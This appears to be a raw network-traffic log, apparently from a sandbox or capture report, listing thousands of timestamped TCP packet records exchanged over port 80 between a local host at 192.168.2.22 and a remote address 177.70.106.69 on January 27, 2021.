                                                                                                                                                                                  Jan 27, 2021 06:51:27.274254084 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274259090 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274275064 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274279118 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274296045 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274307966 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274312019 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274326086 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274343014 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274343014 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274359941 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274378061 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274384975 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274394989 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274401903 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274413109 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274432898 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274446011 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274480104 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.274996996 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.531234980 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.531284094 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.531459093 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532286882 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532326937 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532376051 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532404900 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532419920 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532426119 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532459021 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532486916 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532500029 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532526016 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532540083 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532568932 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532579899 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532603979 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532629967 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532648087 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532670975 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532696962 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532718897 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532728910 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532764912 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532778978 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532804012 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532823086 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532844067 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532852888 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532882929 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532901049 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532918930 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532927990 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532958984 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532974958 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.532996893 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.533015966 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.533042908 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.534813881 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.534856081 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.534894943 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.534919977 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.534934998 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.534936905 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.534985065 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535028934 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535065889 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535104990 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535120964 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535130978 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535135984 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535141945 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535145998 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535145998 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535185099 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535224915 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535259008 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535265923 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535315037 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535357952 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535376072 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535396099 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535434008 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535471916 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535490036 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535510063 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535535097 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535547972 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535586119 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535600901 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535634995 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535650969 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535679102 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535697937 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535717010 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535754919 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535770893 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535794020 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535818100 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535834074 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535865068 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535872936 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535911083 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535931110 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.535996914 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.541151047 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.790919065 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791008949 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791069031 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791127920 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791137934 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791208029 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791217089 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791222095 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791279078 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791285038 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791336060 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791344881 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791395903 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791418076 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791477919 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791517973 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791568995 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791577101 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791626930 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791641951 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791698933 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791712999 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791765928 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791771889 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791822910 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791831970 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791882992 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791894913 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791943073 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.791954994 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792012930 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792013884 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792071104 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792078018 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792140961 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792146921 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792205095 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792217970 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792275906 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792308092 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792336941 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792337894 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792396069 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792402983 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792455912 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792457104 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792510033 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792515039 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792567015 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792572975 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792628050 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792638063 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792701006 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792706966 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792762995 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792768002 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792821884 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792825937 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.792907953 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.799762011 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.799808025 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.799849987 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.799865007 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.799887896 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.799913883 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.799926043 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.799937010 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.799943924 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.799981117 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.799999952 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800021887 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800050020 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800062895 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800091028 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800102949 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800103903 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800139904 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800156116 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800179958 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800198078 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800218105 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800240040 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800265074 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800266981 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800307989 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800322056 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800345898 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800362110 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800384998 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800400972 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800425053 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800441027 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800465107 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800481081 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800503969 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800523996 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800542116 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800560951 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800590992 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800599098 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800633907 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800649881 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800673008 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800689936 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800712109 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800734997 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.800767899 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801096916 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801136971 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801173925 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801176071 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801192999 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801213980 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801244020 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801250935 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801253080 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801280975 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801290989 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801323891 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801330090 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801346064 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801376104 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801400900 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801457882 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801459074 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801503897 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801512957 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801542997 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801563025 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801580906 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801604986 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801620007 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801626921 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801657915 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801671982 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801697016 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801733017 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801738024 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801753998 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801786900 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801789999 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801830053 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801861048 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801868916 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801882029 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801908016 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801922083 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801948071 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801961899 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.801985025 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802004099 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802023888 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802040100 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802062035 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802077055 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802109003 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802117109 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802165985 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802180052 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802218914 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802232981 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802257061 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802272081 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802304983 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802324057 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802335024 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802365065 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802366018 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802386999 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802407026 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802423000 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802440882 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802465916 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802469015 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802488089 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802500010 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802506924 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802531004 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802558899 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802560091 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802581072 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:27.802591085 CET8049166177.70.106.69192.168.2.22
